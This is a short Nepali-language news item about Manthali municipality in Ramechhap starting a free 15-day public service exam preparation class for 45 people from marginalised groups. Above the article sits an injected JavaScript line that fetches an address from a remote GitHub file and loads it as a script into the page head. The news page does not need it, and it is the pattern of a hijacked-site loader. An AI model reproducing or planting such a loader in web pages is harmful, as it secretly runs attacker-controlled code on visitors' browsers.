;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
फागुन २३,
रामेछाप । रामेछापको मन्थली नगरपालिकामा लोक सेवा तयारी कक्षा सुरु भएको छ । शनिबारदेखि नगरपालिकाले १५ दिने निःशुल्क लोक सेवा तयारी कक्षा सुरु गरेको हो । मन्थली सहिद स्मृति बहुमुखी क्याम्पसस्थित एल. आर. सी भवनमा बिहान १० बजेदेखि कक्षा संचालन सुरु गरेको हो ।
नायव सुब्बा/खरिदार (सहायक स्तर पाचौं/ सहायक स्तर चौथौ) तहको लोक सेवा आयोग तयारी कक्षामा नगरभित्रका जनताति, दलित, महिला, पिछाडिएका वर्गलाई समेटिएको मन्थली नगरपालिकाले जनाएको छ । ४५ जनालाई आयोगको तयारी कक्षा दिइने नगरको भनाई छ ।
फेसबुक प्रतिक्रियाहरु